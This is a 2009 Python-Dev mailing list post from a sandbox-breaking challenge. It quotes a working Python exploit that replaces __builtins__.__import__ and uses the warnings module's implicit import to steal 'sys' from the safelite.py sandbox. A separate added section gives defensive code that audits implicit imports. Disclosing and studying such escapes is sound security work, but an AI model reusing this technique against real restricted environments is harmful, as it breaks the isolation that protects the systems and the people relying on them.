[Python-Dev] Challenge: Please break this! [Now with blog post]

tav tav at espians.com
Tue Feb 24 09:27:01 CET 2009


Daniel emailed in the exploit below and it is pretty devastating. It
takes advantage of the fact that the warnings framework in 2.6+
dynamically imports modules without being explicitly called!!

I've fixed this hole in safelite.py, but would be interested to know
if there are other non-user-initiated dynamically imported modules?

Thanks Daniel for bringing this to our attention!


On Tue, Feb 24, 2009 at 4:46 AM, Daniel (ajax) Diniz <ajaksu at gmail.com> wrote:
> Here's my attempt. Uses the builtin warnings module. You might need to
> change 'args[1]' to 'args[2]' depending on your environment.
>
> I really don't like to post these to public MLs, but feel free to do
> so if you think no harm may arise from this one ;)
>
> Daniel
> ----
>
> from safelite import FileReader
>
> # Let's build a fake module
> warnings = __builtins__.__class__('warnings')
>
> # Fill it with deception
> warnings.default_action = "ignore"
>
> # And provide a supporting thug
> def __import__(*args):
>    try:
>        print "How nice:\n", args[1].keys()
>        global sys
>        sys = args[1]['sys']
>
>    except Exception, v:
>        print "Exception:", v
>    return warnings
>
> # Put the bogus module at the doorstep...
> __builtins__.warnings = warnings
>
> # and have the thug replacing the doorman
> __builtins__.__import__ = __import__
>
> # An unsuspecting customer passes by...
> FileReader('safelite.py').seek(1.1)
>
> # ... and is brutally mugged :)
> print sys
> print dir(sys)
>



-- 
love, tav

plex:espians/tav | tav at espians.com | +44 (0) 7809 569 369
http://tav.espians.com | http://twitter.com/tav | skype:tavespian
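
The question above about other non-user-initiated imports can be checked empirically. This is an added example, not part of the original message or of safelite.py: it is written for CPython 3, and the helper names (`record_imports`, `implicit_imports`, `parse_date`) are hypothetical. It logs every call that reaches `builtins.__import__` while a function runs, showing that `time.strptime()` imports `_strptime` implicitly and hands the caller's namespace to the import hook.

```python
# Added example (CPython 3); not from safelite.py or the original thread.
import builtins
import contextlib
import time


@contextlib.contextmanager
def record_imports(log):
    """Log every call that reaches builtins.__import__ while active."""
    real_import = builtins.__import__

    def auditing_import(name, globs=None, locs=None, fromlist=(), level=0):
        # The second argument is the namespace of the code that triggered
        # the import; record only its module name, never the dict itself.
        caller = (globs or {}).get("__name__", "<no globals>")
        log.append((name, caller))
        return real_import(name, globs, locs, fromlist, level)

    builtins.__import__ = auditing_import
    try:
        yield log
    finally:
        builtins.__import__ = real_import  # always restore the real hook


def implicit_imports(func, *args):
    """Run func(*args) and return the (module, caller) pairs it imported."""
    with record_imports([]) as log:
        func(*args)
    return log


def parse_date():
    # No import statement here: time.strptime() is C code that imports the
    # pure-Python _strptime module on the caller's behalf.
    return time.strptime("2009-02-24", "%Y-%m-%d")


if __name__ == "__main__":
    for name, caller in implicit_imports(parse_date):
        print(f"implicit import of {name!r}, caller namespace {caller!r}")
```

Running a sandbox's exposed API surface through `implicit_imports` gives a list of import sites that have to be covered before `__import__` in the restricted builtins can be considered safe from replacement.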

